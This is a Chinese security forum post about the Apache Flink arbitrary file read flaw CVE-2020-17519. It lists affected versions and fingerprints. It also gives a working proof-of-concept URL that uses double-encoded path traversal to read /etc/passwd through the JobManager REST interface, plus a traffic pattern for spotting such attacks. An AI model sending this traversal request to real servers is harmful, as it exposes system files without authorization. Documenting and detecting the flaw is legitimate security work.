apache Fink 任意文件读取漏洞(CVE-2020-17519)
漏洞描述:Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
攻击者可利用JobManager进程的REST接口读取JobManager本地文件系统上文件。
漏洞影响:
apache Flink 1.11.0 1.11.1 1.11.2版本
静态特征码:
Apache Flink Web Dashboard
在HTML源码中找到此版本独有的特征
动态特征:
GET /runtime.0dcf16aad31edd73d8e8.js
在流量中找到此版本独有的特征
漏洞复现:
验证POC
http://HOST/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
在响应数据里显示root:x:证明漏洞存在
验证是否被攻击
识别:GET /jobmanager/logs/..%252f..%252f
在流量中抓取到
识别2
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-劲夫 | 30.00 | 0 | 2022-08-05 11:11:05 | 一个受益终生的帖子~~ |
打赏我,让我更有动力~
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
13587947005
发表于 2022-8-5
哇,第一次
评论列表
加载数据中...